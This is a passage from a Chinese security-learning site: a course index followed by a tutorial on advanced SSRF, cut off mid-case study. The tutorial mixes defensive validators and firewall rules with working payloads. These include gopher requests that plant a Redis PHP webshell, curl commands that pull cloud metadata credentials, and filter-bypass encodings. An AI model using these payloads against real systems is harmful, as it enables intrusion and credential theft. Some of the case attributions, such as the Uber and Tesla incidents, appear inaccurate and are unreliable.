公开文集
0x01 信安之路安全产品
0x01 SRC 资产管理系统
001 企业资产有那些?
002 订阅最新 POC
003 IP 域名关联查询
004 公益权重数据
0x02 安全学习成长平台
001 成长平台视频参考
100 百分成就-学习心得-TOP 21 小伙伴
101 百分成就-学习心得-不想起床
102 百分成就-学习心得-不驚
103 百分成就-学习心得-aiDa0
104 百分成就-学习心得-起十二
105 百分成就-学习心得-Eyes
201 你为什么选择信安之路!
0x03 安全知识库
001 蜜罐运营专辑
0x04 自研蜜罐系统
0x02 Web 漏洞案例库
0x01 配置安全
001 header 安全配置
002 首页信息泄露
003 HTTP 访问控制 (CORS)
0x02 安全控制缺失
001 速率限制绕过
0x03 应用逻辑
0x03 小程序漏洞案例库
第一章:小程序渗透基础
1.1 微信小程序反编译与动态调试
1.2 微信小程序强制开启开发者模式
0x04 星球讨论知识问答
信息安全入门
学习方向选择
学习经验分享
安全产品研发
代码审计
物联网安全
APT
安全防御建设
安全建设经验
数据泄露监控
网络安全
终端安全
主机安全
产品安全
安全意识
数据安全
内部资产管理
安全管理
应急响应
网络安全架构
安全运营
业务安全
运维安全
渗透测试技术
信息收集
EXP/POC
web 测试
APP测试
内网渗透
0x05 代码审计小挑战
01 前端安全问题
101 script 标签下的 XSS
102 消息事件引发的 DOM XSS
104 常规评论 xss 漏洞
105 页面开放重定向漏洞
106 部分过滤的 xss 漏洞绕过
107 基于 DOM 的 XSS
108 CORS 配置错误
109 退出登录出 XSS
110 URL 重定向漏洞
111 CSRF 漏洞利用
112 JavaScript 代码注入
113 xss 绕过括号和反引号检测
02 文件操作类问题
201 Django 任意文件读取漏洞
202 php 后缀黑名单验证绕过上传
203 jsp 任意文件上传
204 jsp 代码中的 SSRF 漏洞
205 jsp 目录穿越漏洞
206 PHP文件包含漏洞
207 Django 本地文件包含
208 文件包含功能绕过
209 SSRF 跨服务端请求伪造
210 本地文件包含漏洞 windows
211 目录穿越漏洞
212 文件上传绕过
213 php 文件包含漏洞
03 注入类问题
301 由 SQL 注入引发的命令执行
302 php8 XML 实体注入
303 正则问题导致验证绕过
304 XPath 注入
305 典型认证 SQL 注入
306 数字型 SQL 注入
307 主机头(host header)注入
308 LDAP 注入
309 典型的万能密码漏洞
310 Ldap 注入漏洞代码
04 命令执行类问题
401 调用第三方工具时被劫持
402 原型污染导致命令执行
403 php array_map 代码执行
404 命令执行绕过检测
405 SSTI 模板注入
406 文件名注入 RCE
407 无防护命令执行
408 python eval 注入
409 绕过多个黑名单命令
05 业务逻辑类问题
501 django 认证 jwt 未验证 token
502 绕过权限检测执行命令
503 密码找回邮箱地址大小写绕过
504 DNS 重绑定问题
505 权限比对逻辑问题
506 越权访问其他用户的记录
507 用户注册问题
508 用户权限验证逻辑问题
509 PHP 判断两个变量相等逻辑问题
06 反序列化类问题
601 php 反序列化漏洞
602 python 反序列化漏洞
09 C语言问题
901 c 条件竞争
902 缓冲区溢出
903 通配符注入提权
0x99 AI 教你学安全
01-网络安全基础
Day-001-TCP-IP协议栈安全分析
Day-002-DNS协议安全与DNS劫持攻防
Day-003-IPv6 安全基础与过渡
Day-004-HTTP-HTTPS协议深度解析
Day-005-网络嗅探与流量分析技术
Day-006-防火墙原理与配置实践
Day-007-网络地址转换 NAT 安全分析
Day-008-路由协议安全 RIP-OSPF-BGP
Day-009-VLAN 安全与 VLAN-Hopping
Day-010-无线网络基础与安全 802.11
Day-011-网络访问控制 802.1X-NAC
Day-012-网络分段与微隔离设计
Day-013-负载均衡器安全配置
Day-014-CDN安全与防护
Day-015-NTP安全
Day-016-DHCP安全与攻击防护
Day-017-ICMP协议安全分析
Day-018-网络协议模糊测试基础
Day-019-网络流量基线建立
Day-020-网络取证基础
Day-021-网络入侵检测系统 NIDS
Day-022-网络入侵防御系统 NIPS
Day-023-网络流量加密与解密
Day-024-网络协议逆向工程基础
Day-025-网络性能与安全权衡
Day-026-SDN 安全
Day-027-网络虚拟化安全
Day-028-网络欺骗技术
Day-029-网络威胁情报应用
Day-030-网络容量规划与安全
Day-031-网络安全架构设计实战
02-Web 安全
Day-032-OWASP-Top-10-2021详解
Day-033-SQL 注入原理与手工检测
Day-034-SQL注入进阶报错注入与盲注
Day-035-XSS跨站脚本攻击基础
Day-036-XSS 进阶绕过与利用
Day-038-CSRF 跨站请求伪造
Day-039-文件上传漏洞
Day-040-反序列化漏洞基础
Day-041-PHP反序列化深入
Day-042-Java反序列化深入
Day-043-SSTI 服务端模板注入
Day-044-文件包含漏洞 LFI-RFI
Day-045-命令注入漏洞
Day-046-XXE-XML 外部实体注入
Day-047-反序列化漏洞进阶
Day-048-API 安全基础
Day-049-API认证与授权安全
Day-050-API漏洞挖掘实战
Day-051-文件上传漏洞进阶
Day-052-反序列化漏洞实战
Day-053-Web 安全综合实战
Day-054-移动安全基础
Day-055-Android 应用安全测试
Day-056-iOS 应用安全测试
Day-057-移动应用综合实战
Day-058-云安全基础
Day-059-AWS 安全实战
Day-060-Azure 安全实战
Day-061-GCP 安全实战
Day-062-云安全综合实战
Day-063-容器安全基础
Day-064-Docker 安全实战
Day-065-Kubernetes 安全实战
Day-066-容器安全综合实战
Day-067-API 安全进阶
Day-068-服务端请求伪造 SSRF 深入
Day-069-文件上传漏洞进阶
Day-070-反序列化漏洞实战进阶
Day-071-业务逻辑漏洞深入
Day-072-前端安全深入
Day-073-Web 安全综合实战
Day-074-云安全进阶
Day-075-移动安全进阶
Day-076-API 安全进阶
Day-077-前端安全进阶
Day-078-业务逻辑漏洞进阶
Day-079-反序列化漏洞实战进阶
Day-080-文件上传漏洞实战进阶
Day-081-SSTI 服务端模板注入进阶
Day-082-XXE-XML 外部实体注入进阶
Day-083-SSRF 服务端请求伪造进阶
Day-084-命令注入漏洞进阶
Day-085-文件包含漏洞进阶
Day-086-反序列化漏洞实战进阶
Day-087-文件上传漏洞实战进阶
Day-088-SSTI 服务端模板注入实战进阶
Day-089-XXE-XML 外部实体注入实战进阶
Day-090-SSRF 服务端请求伪造实战进阶
Day-091-命令注入漏洞实战进阶
Day-092-Web 安全综合实战
Day-093-GraphQL 安全
Day-094-JWT 与 OAuth2 安全
03-系统安全
Day-095-系统监控与检测
Day-096-主机防火墙配置
Day-097-系统审计与合规
Day-098-Linux 系统安全进阶
Day-099-Windows 系统安全进阶
Day-100-容器安全进阶
Day-101-容器编排安全进阶
Day-102-Linux 内核安全
Day-103-Windows 内核安全
Day-104-系统安全总结与实战
Day-105-Linux 系统安全基础
Day-106-Windows 系统安全基础
Day-107-容器安全基础
Day-108-系统加固技术
Day-109-日志分析技术
Day-110-威胁狩猎技术
04-应用安全
Day-111-安全编码规范
Day-112-输入验证技术
Day-113-输出编码技术
Day-114-错误处理安全
Day-115-会话管理安全
Day-116-认证安全
Day-117-授权安全
Day-118-数据保护安全
Day-119-日志安全
Day-120-API 安全
Day-121-微服务安全
Day-122-新兴技术安全概论
Day-123-DevSecOps 流水线安全
Day-124-云原生安全架构
Day-125-API 安全最佳实践
Day-126-安全编码规范
Day-127-SDL 安全开发生命周期
Day-128-威胁建模实战
Day-129-安全需求分析
Day-130-安全架构设计
Day-131-安全编码实践Java
Day-132-安全编码实践Python
Day-133-代码审计方法论
Day-134-静态代码分析SAST
Day-135-动态应用测试DAST
Day-136-交互式测试IAST
Day-137-软件成分分析SCA
Day-138-依赖漏洞管理
Day-139-安全测试自动化
Day-140-漏洞管理与响应
Day-142-OWASP-Top10-2024 详解
Day-143-CWE-Top25 分析
Day-144-漏洞挖掘方法论
Day-145-模糊测试技术
Day-146-逆向工程基础
Day-147-漏洞利用开发基础
Day-148-漏洞复现与验证
Day-149-漏洞披露流程
Day-150-CVE 申请与管理
Day-151-漏洞赏金计划
Day-152-等保2.0详解
Day-153-GDPR 合规实践
Day-154-数据安全法解读
Day-155-个人信息保护法与合规指南
Day-156-个人信息保护法解读
Day-157-ISO-27001 信息安全管理体系
Day-158-SOC-2 合规与审计
Day-159-PCI-DSS 支付卡行业数据安全标准
Day-160-网络安全审查办法解读
Day-161-数据出境安全评估办法
Day-162-应用安全评估实战
Day-163-红蓝对抗演练
Day-164-安全应急响应
Day-165-安全运营中心建设
Day-166-应用安全总结与展望
05-密码学
Day-167-密码学基础
Day-168-对称加密算法详解
Day-169-非对称加密算法详解
Day-170-哈希函数与数字签名
Day-171-密钥管理与PKI
Day-172-TLS-SSL 协议详解
Day-173-国密算法详解
Day-174-认证与密钥协议
Day-175-随机数生成与熵源
Day-176-椭圆曲线密码学详解
Day-177-后量子密码学详解
Day-178-高级密码学主题
Day-179-密码学行业应用精选
Day-180-常用加密算法原理与实现
Day-181-密码学总结与展望
06-渗透测试
Day-183-渗透测试方法论
Day-184-信息收集技术详解
Day-185-漏洞扫描技术详解
Day-186-漏洞利用技术详解
Day-187-渗透测试中的漏洞利用框架
Day-188-漏洞利用框架与 Metasploit 深入
Day-189-渗透测试中的 WAF 绕过技术
Day-190-渗透测试中的模糊测试技术
Day-191-渗透测试中的代码审计与静态分析
Day-192-渗透测试中的密码哈希破解技术
Day-193-渗透测试报告编写指南
Day-194-Web 应用渗透测试
Day-195-渗透测试中的 API 安全测试
Day-196-渗透测试中的 GraphQL 安全测试
Day-197-渗透测试中的前后端分离应用测试
Day-198-渗透测试中的小程序安全测试
Day-199-渗透测试中的浏览器安全测试
Day-200-OAuth-SSO安全测试
Day-201-渗透测试中的业务逻辑漏洞测试
Day-202-渗透测试中的厚客户端安全测试
Day-203-渗透测试综合实战演练
Day-204-内网渗透技术详解
Day-205-渗透测试中的内网信息收集进阶
Day-206-渗透测试中的域森林渗透技术
Day-207-渗透测试中的权限维持技术
Day-208-渗透测试中的横向移动技术
Day-209-渗透测试中的痕迹清理与反取证技术
Day-210-渗透测试中的数据窃取与 Exfiltration 技术
Day-211-渗透测试中的内部威胁与数据泄露测试
Day-212-渗透测试中的物理安全渗透
Day-213-社会工程学攻击技术
Day-214-移动应用渗透测试
Day-215-云安全渗透测试
Day-216-渗透测试中的容器与 Kubernetes 安全渗透
Day-217-渗透测试中的 Serverless 安全测试
Day-218-渗透测试中的微服务安全测试
Day-219-物联网安全渗透测试
Day-220-工业控制系统安全渗透测试
Day-221-无线网络安全渗透测试
Day-222-数据库安全渗透测试
Day-223-渗透测试中的供应链安全测试
Day-224-红队演练技术详解
Day-225-渗透测试中的红队基础设施搭建
Day-226-渗透测试中的威胁情报与狩猎
Day-227-渗透测试中的综合指纹识别技术
Day-228-自动化渗透测试技术
Day-229-渗透测试中的运维安全测试
Day-230-渗透测试中的区块链与智能合约安全测试
Day-231-渗透测试中的漏洞管理与修复验证
Day-232-渗透测试法律与合规
Day-233-后渗透攻击技术详解
Day-234-渗透测试中的人工智能应用
Day-235-漏洞利用开发深入
Day-236-云原生渗透测试深入
07-应急响应
Day-237-应急响应概述与核心概念
Day-238-应急响应流程框架
Day-239-CSIRT 团队组建与职责分工
Day-240-应急响应工具包准备
Day-241-应急响应法律与合规要求
Day-242-安全事件检测方法与指标
Day-243-云原生应急响应
Day-244-日志收集与分析技术
Day-245-网络流量分析与异常识别
Day-246-自动化响应与 SOAR
Day-247-端点监控与 EDR 技术
Day-248-威胁狩猎方法论
Day-249-威胁情报在检测中的应用
Day-250-数字取证基础与证据链管理
Day-251-内存取证技术
Day-252-磁盘取证与文件恢复
Day-253-网络取证与数据包分析
Day-254-云环境与容器取证
Day-255-恶意代码静态分析技术
Day-256-恶意代码动态分析技术
Day-257-恶意代码行为分析方法
Day-258-逆向工程基础与工具
Day-259-沙箱技术与自动化分析
Day-260-事件隔离与遏制策略
Day-261-威胁根除与系统修复
Day-262-系统恢复与数据重建
Day-263-业务连续性计划
Day-264-事件复盘与经验总结
Day-265-APT 攻击事件复盘分析
Day-266-勒索软件事件响应实战
Day-267-数据泄露事件处置流程
Day-268-内部威胁调查与取证
Day-269-综合应急响应演练
08-安全运维
Day-270-安全运营中心 SOC 概述
Day-271-安全监控指标体系
Day-272-安全告警管理
Day-273-安全可视化与仪表盘
Day-274-监控工具选型
Day-275-日志采集技术
Day-276-日志标准化与解析
Day-277-日志存储与归档
Day-278-日志分析技术
Day-279-日志合规要求
Day-280-SIEM 架构与设计
Day-281-关联规则引擎
Day-282-高级关联分析
Day-283-UEBA 用户实体行为分析
Day-284-威胁狩猎
Day-285-SOAR 基础概念
Day-286-剧本设计
Day-287-自动化响应技术
Day-288-安全工具集成
Day-289-SOAR 度量与优化
Day-290-安全基线管理
Day-291-漏洞管理流程
Day-292-补丁管理策略
Day-293-变更安全管理
Day-294-合规审计技术
Day-295-7x24 安全运营
Day-296-安全事件管理流程
Day-297-安全运营度量体系
Day-298-持续改进机制
Day-299-安全运维综合演练
Day-300-云原生安全运营
Day-301-AI 与机器学习安全运营
Day-302-安全自动化脚本实战
09-移动安全
Day-303-移动安全威胁概述
Day-304-移动设备安全架构
Day-305-移动操作系统安全模型
Day-306-移动应用权限管理
Day-307-移动端数据加密
Day-308-330-Android 安全合集
Day-309-Android 安全架构
Day-310-Android 组件安全
Day-311-Android 权限与隐私
Day-312-Android 逆向工程
Day-313-Android 应用加固
Day-314-iOS 安全架构
Day-315-iOS 应用沙盒机制
Day-316-越狱与反越狱
Day-317-iOS 逆向工程
Day-318-iOS 企业分发安全
Day-319-移动安全开发生命周期
Day-320-移动应用安全测试
Day-321-移动应用加固技术
Day-322-移动威胁防护
Day-323-移动安全合规
10-云安全
Day-324-云计算安全模型
Day-325-责任共担模型
Day-326-云安全威胁模型
Day-327-云安全合规框架
Day-328-云安全架构设计
Day-329-AWS IAM 安全
Day-330-AWS 网络安全
Day-331-AWS 存储安全
Day-332-AWS 安全监控
Day-333-AWS 安全最佳实践
Day-334-Azure AD 安全
Day-335-Azure 网络安全
Day-336-Azure 存储安全
Day-337-Azure 安全中心
Day-338-Azure 安全最佳实践
Day-339-容器安全基础
Day-340-Kubernetes 安全
Day-341-Serverless 安全
Day-342-云原生 DevSecOps
Day-343-云安全态势管理 CSPM
11-物联网工控
Day-344-物联网安全概述
Day-345-IoT 通信协议安全
Day-346-IoT 设备安全
Day-347-IoT 平台安全
Day-348-IoT 应用安全
Day-349-工业控制系统概述
Day-350-工控协议安全
Day-351-PLC 安全
Day-352-SCADA 系统安全
Day-353-工控安全防护
12-综合与总结
Day-354-安全职业发展路径
Day-355-安全技术趋势展望
Day-356-安全建设方法论
Day-357-经典攻防案例复盘
Day-358-安全学习资源指南
Day-359-信息安全行业求职指南
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Day-068-服务端请求伪造 SSRF 深入
# Day 66: 服务端请求伪造(SSRF)深入 > Web 安全系列第 36 天 | 预计阅读时间:40 分钟 | 难度:★★★★☆ --- ## 清单 目录 1. [SSRF 概述](#ssrf 概述) 2. [SSRF 原理详解](#ssrf 原理详解) 3. [SSRF 利用场景](#ssrf 利用场景) 4. [云环境 SSRF](#云环境 ssrf) 5. [SSRF 绕过技术](#ssrf 绕过技术) 6. [SSRF 检测技术](#ssrf 检测技术) 7. [SSRF 防护进阶](#ssrf 防护进阶) 8. [实战案例分析](#实战案例分析) 9. [总结与思考](#总结与思考) 10. [参考资料](#参考资料) --- ## SSRF 概述 ### 什么是 SSRF **定义**: ``` SSRF(Server-Side Request Forgery,服务端请求伪造) 是一种攻击技术,攻击者诱导服务器发起 非预期的请求,从而访问内部资源或外部系统。 ``` **形象理解**: ``` 如果把服务器比作一个秘书: - 正常请求 = 老板让秘书查公开资料 - SSRF 攻击 = 坏人骗秘书查内部机密 - 秘书 = 服务器 - 后果 = 内部信息泄露或内网沦陷 ``` **SSRF 类型**: ``` 基本 SSRF: - 访问外部资源 - 端口扫描 - 服务探测 盲 SSRF: - 无直接响应 - 通过时间判断 - DNS 外带 高级 SSRF: - 协议滥用 - 内网访问 - 云元数据 ``` ### SSRF 危害 **信息泄露**: ``` 1. 云元数据 - AWS: 169.254.169.254 - Azure: 169.254.169.254 - GCP: 169.254.169.254 2. 内部服务 - 数据库 - 缓存 - 消息队列 3. 配置文件 - 应用配置 - 凭证文件 - 日志文件 ``` **内网渗透**: ``` 1. 端口扫描 - 发现服务 - 识别版本 - 漏洞探测 2. 服务访问 - Redis - MongoDB - Elasticsearch 3. 横向移动 - 访问内网应用 - 利用信任关系 - 权限提升 ``` **远程代码执行**: ``` 1. 协议滥用 - Gopher 协议 - Dict 协议 - File 协议 2. 服务利用 - Redis 写文件 - FastCGI 执行 - WebLogic T3 3. 命令执行 - 直接执行 - 文件包含 - 代码注入 ``` **真实案例**: ``` 案例 1: Capital One(2019) - 漏洞:SSRF 访问元数据 - 影响:1 亿用户数据 - 手法:访问 AWS 元数据 - 后果:8000 万美元罚款 案例 2: Uber(2016) - 漏洞:SSRF 访问内网 - 影响:5700 万用户 - 手法:访问内部服务 - 后果:1 亿美元和解 案例 3: Tesla(2018) - 漏洞:SSRF 访问 K8s - 影响:挖矿攻击 - 手法:访问 K8s API - 后果:资源滥用 ``` --- ## SSRF 原理详解 ### 漏洞产生 **常见场景**: ``` 1. URL 参数 GET /fetch?url=http://example.com 2. 文件导入 POST /import file_url=http://example.com/file.csv 3. Webhook POST /webhook callback_url=http://example.com/callback 4. 文件上传 POST /upload avatar_url=http://example.com/avatar.jpg 5. API 集成 POST /sync remote_api=http://partner.com/api ``` **危险函数**: ```python # Python requests.get(url) urllib.request.urlopen(url) httplib2.Http().request(url) # PHP file_get_contents($url) curl_exec($ch) fopen($url, 'r') # Java HttpURLConnection(url).connect() HttpClient().execute(HttpGet(url)) ``` **漏洞代码示例**: ```python # - 错误做法 @app.route('/fetch') def fetch(): url = request.args.get('url') response = requests.get(url) return response.text # 攻击 # /fetch?url=http://169.254.169.254/latest/meta-data/ ``` ### SSRF 利用链 **基本利用链**: ``` 1. 发现 SSRF 点 - URL 参数 - 文件导入 - Webhook 2. 探测内网 - 扫描端口 - 识别服务 - 发现敏感服务 3. 访问服务 - HTTP 服务 - 数据库 - 缓存 4. 利用服务 - 读取数据 - 写入数据 - 执行命令 ``` **云环境利用链**: ``` 1. 访问元数据 - 获取凭证 - 获取配置 - 获取角色 2. 使用凭证 - 访问 S3 - 访问 RDS - 访问其他服务 3. 横向移动 - 访问其他实例 - 访问其他账户 - 完全控制 ``` --- ## SSRF 利用场景 ### 内网扫描 **端口扫描**: ```http # 扫描常见端口 GET /fetch?url=http://192.168.1.1:22 GET /fetch?url=http://192.168.1.1:80 GET /fetch?url=http://192.168.1.1:443 GET /fetch?url=http://192.168.1.1:3306 GET /fetch?url=http://192.168.1.1:6379 # 通过响应时间/内容判断 # - 连接成功:端口开放 # - 连接失败:端口关闭 # - 超时:被防火墙阻止 ``` **服务识别**: ```http # 识别 HTTP 服务 GET /fetch?url=http://192.168.1.1:80 # 响应:HTTP/1.1 200 OK # 识别 Redis GET /fetch?url=http://192.168.1.1:6379 # 响应:-ERR unknown command # 识别 MongoDB GET /fetch?url=http://192.168.1.1:27017 # 响应:MongoDB 二进制响应 ``` **批量扫描**: ```python import requests import threading def scan_port(ip, port): try: url = f'http://{ip}:{port}' response = requests.get(url, timeout=1) print(f'{ip}:{port} - Open') except: pass # 扫描网段 for i in range(1, 255): ip = f'192.168.1.{i}' for port in [22, 80, 443, 3306, 6379]: threading.Thread(target=scan_port, args=(ip, port)).start() ``` ### 服务利用 **Redis 利用**: ``` 场景 1: 未授权访问 - 无密码 Redis - 内网开放 - 可直接访问 利用: # 写入 Webshell GET /fetch?url=redis://192.168.1.1:6379/ # 通过 Gopher 协议 GET /fetch?url=gopher://192.168.1.1:6379/_CONFIG%20SET%20dir%20/var/www/html GET /fetch?url=gopher://192.168.1.1:6379/_CONFIG%20SET%20dbfilename%20shell.php GET /fetch?url=gopher://192.168.1.1:6379/_SET%20shell%20%22%3C%3Fphp%20system%28%24_GET%5B%27c%27%5D%29%3B%3F%3E%22 GET /fetch?url=gopher://192.168.1.1:6379/_SAVE ``` **MongoDB 利用**: ``` 场景 1: 未授权访问 - 无密码 MongoDB - 内网开放 - 可直接访问 利用: # 读取数据 GET /fetch?url=http://192.168.1.1:27017/ # 通过 HTTP 接口 GET /fetch?url=http://192.168.1.1:28017/test/ # 列出数据库 GET /fetch?url=http://192.168.1.1:28017/_listDatabases ``` **Elasticsearch 利用**: ``` 场景 1: 未授权访问 - 无密码 ES - 内网开放 - 可直接访问 利用: # 列出索引 GET /fetch?url=http://192.168.1.1:9200/_cat/indices # 搜索数据 GET /fetch?url=http://192.168.1.1:9200/_search?q=password # 执行脚本 POST /fetch url=http://192.168.1.1:9200/_search body={"script":{"inline":"Runtime.getRuntime().exec('whoami')"}} ``` --- ## 云环境 SSRF ### AWS 元数据 **元数据服务**: ``` IMDSv1(旧版): - 无需认证 - 直接访问 - 安全风险 IMDSv2(新版): - 需要会话令牌 - 更安全 - 推荐启用 ``` **访问元数据**: ```bash # IMDSv1 curl http://169.254.169.254/latest/meta-data/ # 获取实例 ID curl http://169.254.169.254/latest/meta-data/instance-id # 获取 IAM 角色 curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ # 获取凭证 curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name ``` **利用链**: ``` 1. SSRF 访问元数据 curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2. 获取角色名 role-name 3. 获取凭证 curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name 4. 使用凭证 export AWS_ACCESS_KEY_ID=... export AWS_SECRET_ACCESS_KEY=... export AWS_SESSION_TOKEN=... 5. 访问 AWS 资源 aws s3 ls aws ec2 describe-instances ``` ### Azure 元数据 **元数据服务**: ``` IMDS(Instance Metadata Service): - 需要特定 Header - 需要元数据版本 - 更安全 ``` **访问元数据**: ```bash # 访问元数据 curl -H "Metadata:true" \ "http://169.254.169.254/metadata/instance?api-version=2021-02-01" # 获取计算信息 curl -H "Metadata:true" \ "http://169.254.169.254/metadata/instance/compute?api-version=2021-02-01" # 获取网络信息 curl -H "Metadata:true" \ "http://169.254.169.254/metadata/instance/network?api-version=2021-02-01" ``` **利用链**: ``` 1. SSRF 访问元数据 curl -H "Metadata:true" http://169.254.169.254/metadata/instance/ 2. 获取信息 - 订阅 ID - 资源组 - 虚拟机信息 3. 访问管理端点 curl -H "Metadata:true" \ "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" 4. 使用 Token 访问 Azure ``` ### GCP 元数据 **元数据服务**: ``` GCP Metadata Server: - 需要特定 Header - 需要元数据版本 - 更安全 ``` **访问元数据**: ```bash # 访问元数据 curl -H "Metadata-Flavor: Google" \ "http://metadata.google.internal/computeMetadata/v1/" # 获取实例信息 curl -H "Metadata-Flavor: Google" \ "http://metadata.google.internal/computeMetadata/v1/instance/" # 获取服务账户 curl -H "Metadata-Flavor: Google" \ "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/" # 获取 Token curl -H "Metadata-Flavor: Google" \ "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" ``` **利用链**: ``` 1. SSRF 访问元数据 curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/ 2. 获取服务账户 Token curl -H "Metadata-Flavor: Google" \ http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token 3. 使用 Token 访问 GCP curl -H "Authorization: Bearer <token>" \ https://www.googleapis.com/compute/v1/projects/ ``` --- ## SSRF 绕过技术 ### 过滤器绕过 **IP 绕过**: ``` 十进制 IP: - 3232235777 = 192.168.1.1 - 2130706433 = 127.0.0.1 八进制 IP: - 0300.0520.01.01 = 192.168.1.1 - 0177.0.0.1 = 127.0.0.1 十六进制 IP: - 0xC0A80101 = 192.168.1.1 - 0x7F000001 = 127.0.0.1 DNS 重绑定: - 使用域名 - DNS 重绑定攻击 - 首次解析白名单 IP - 二次解析内网 IP ``` **协议绕过**: ``` HTTP 变种: - http:// - https:// - HTTP:// - HttP:// 其他协议: - gopher:// - dict:// - file:// - ftp:// - ldap:// URL 编码: - %68%74%74%70:// = http:// - http://%65%78%61%6d%70%6c%65.com ``` **重定向绕过**: ``` 302 重定向: GET /fetch?url=http://whitelist.com # 302 重定向到 http://192.168.1.1 多次重定向: GET /fetch?url=http://whitelist.com # 302 → http://intermediate.com # 302 → http://192.168.1.1 DNS 重绑定: - 使用特殊域名 - 首次解析白名单 - 二次解析内网 ``` ### WAF 绕过 **参数污染**: ```http # 多个 url 参数 GET /fetch?url=http://whitelist.com&url=http://192.168.1.1 # 数组参数 GET /fetch?url[]=http://whitelist.com&url[]=http://192.168.1.1 # JSON 参数 POST /fetch {"url": "http://whitelist.com", "url": "http://192.168.1.1"} ``` **内容类型绕过**: ```http # 改变 Content-Type POST /fetch Content-Type: application/x-www-form-urlencoded url=http://192.168.1.1 POST /fetch Content-Type: application/json {"url": "http://192.168.1.1"} POST /fetch Content-Type: multipart/form-data ------WebKitFormBoundary Content-Disposition: form-data; name="url" http://192.168.1.1 ``` **编码绕过**: ``` URL 编码: - %68%74%74%70:// = http:// - http://%65%78%61%6d%70%6c%65.com 双重编码: - %2568%2574%2574%2570:// = %68%74%74%70:// - http://%2565%2578%2561%256d%2570%256c%2565.com Unicode 编码: - \u0068\u0074\u0074\u0070:// = http:// ``` --- ## SSRF 检测技术 ### 主动检测 **基础检测**: ```python import requests def detect_ssrf(url): payloads = [ 'http://127.0.0.1', 'http://localhost', 'http://0.0.0.0', 'http://[::1]', 'http://169.254.169.254' ] for payload in payloads: try: response = requests.get(f'{url}?url={payload}') # 检查响应 if 'localhost' in response.text or '127.0.0.1' in response.text: print(f'SSRF detected with payload: {payload}') return True except: pass return False ``` **盲 SSRF 检测**: ```python import requests import time def detect_blind_ssrf(url): # 时间盲注 payloads = [ 'http://127.0.0.1:81', # 关闭端口,超时 'http://127.0.0.1:22', # 开放端口,快速响应 ] for payload in payloads: start = time.time() try: requests.get(f'{url}?url={payload}', timeout=5) except: pass end = time.time() # 检查响应时间 if end - start > 4: print(f'Blind SSRF detected: {payload}') return True return False ``` **DNS 外带检测**: ```python import requests def detect_dns_oob(url): # 使用 DNSlog 服务 dnslog_domain = get_dnslog_domain() # 获取唯一域名 payload = f'http://{dnslog_domain}' try: requests.get(f'{url}?url={payload}') # 检查 DNS 记录 if check_dns_record(dnslog_domain): print(f'DNS OOB SSRF detected') return True except: pass return False ``` ### 被动检测 **日志分析**: ```bash # 检查异常请求 grep "169.254.169.254" /var/log/app.log grep "127.0.0.1" /var/log/app.log grep "localhost" /var/log/app.log # 检查内网访问 grep "192.168\." /var/log/app.log grep "10\." /var/log/app.log grep "172.16\." /var/log/app.log ``` **流量分析**: ```bash # 使用 Wireshark 过滤 ip.dst == 169.254.169.254 ip.dst == 127.0.0.1 ip.dst == 192.168.0.0/16 # 检查异常协议 tcp.port == 6379 # Redis tcp.port == 27017 # MongoDB tcp.port == 9200 # Elasticsearch ``` --- ## SSRF 防护进阶 ### 输入验证 **URL 验证**: ```python from urllib.parse import urlparse import socket import ipaddress def is_safe_url(url): parsed = urlparse(url) # 只允许 HTTP/HTTPS if parsed.scheme not in ['http', 'https']: return False # 解析域名 try: ip = socket.gethostbyname(parsed.hostname) except: return False # 检查 IP ip_obj = ipaddress.ip_address(ip) # 拒绝私有 IP if ip_obj.is_private: return False # 拒绝环回 IP if ip_obj.is_loopback: return False # 拒绝链路本地 IP if ip_obj.is_link_local: return False # 拒绝组播 IP if ip_obj.is_multicast: return False # 拒绝云元数据 IP if str(ip_obj) == '169.254.169.254': return False return True ``` **白名单验证**: ```python from urllib.parse import urlparse ALLOWED_DOMAINS = ['example.com', 'partner.com'] def is_allowed_url(url): parsed = urlparse(url) # 检查域名 if parsed.hostname not in ALLOWED_DOMAINS: return False # 检查端口 if parsed.port and parsed.port not in [80, 443]: return False return True ``` ### 网络隔离 **出站限制**: ```bash # 防火墙规则 # 只允许访问外部 HTTP/HTTPS iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT # 拒绝访问内网 iptables -A OUTPUT -d 10.0.0.0/8 -j DROP iptables -A OUTPUT -d 172.16.0.0/12 -j DROP iptables -A OUTPUT -d 192.168.0.0/16 -j DROP iptables -A OUTPUT -d 127.0.0.0/8 -j DROP iptables -A OUTPUT -d 169.254.169.254 -j DROP # 拒绝其他协议 iptables -A OUTPUT -p tcp --dport 6379 -j DROP iptables -A OUTPUT -p tcp --dport 27017 -j DROP ``` **VPC 配置**: ``` 云环境: - 私有子网 - NAT Gateway - 安全组限制 本地环境: - 网络分段 - 防火墙规则 - 代理服务器 ``` ### 运行时防护 **代理服务器**: ```python # 使用代理控制出站请求 import requests proxies = { 'http': 'http://proxy:3128', 'https': 'https://proxy:3128' } # 所有请求通过代理 response = requests.get(url, proxies=proxies) # 代理可以: # - 过滤 URL # - 记录日志 # - 阻止内网访问 ``` **服务网格**: ``` Istio/Linkerd: - 出站流量控制 - 策略执行 - 流量加密 配置: - ServiceEntry - DestinationRule - AuthorizationPolicy ``` --- ## 实战案例分析 ### 案例 1: Capital One SSRF **漏洞描述**: ``` 时间:2019 年 公司:Capital One 漏洞:SSRF 访问 AWS 元数据 影响:1 亿用户数据 后果:8000 万美元罚款 ``` **攻击流程**: ``` 1. 发现 SSRF - Web 应用防火墙 - 存在 SSRF 漏洞 2. 访问元数据 - curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ 3. 获取凭证 - 获取 IAM 角色凭证 - Access Key + Secret Key 4. 访问 S3 - aws s3 ls - 下载敏感数据 5. 数据泄露 - 1 亿用户信息 - 信用卡申请 - 社会安全号 ``` **教训**: ``` 1. 启用 IMDSv2 - 需要会话令牌 - 防止 SSRF 2. 最小权限 - IAM 角色最小权限 - 限制 S3 访问 3. 网络隔离 - VPC 端点 - 安全组限制 ``` ### 案例 2: Uber SSRF **漏洞描述**: ``` 时间:2016 年 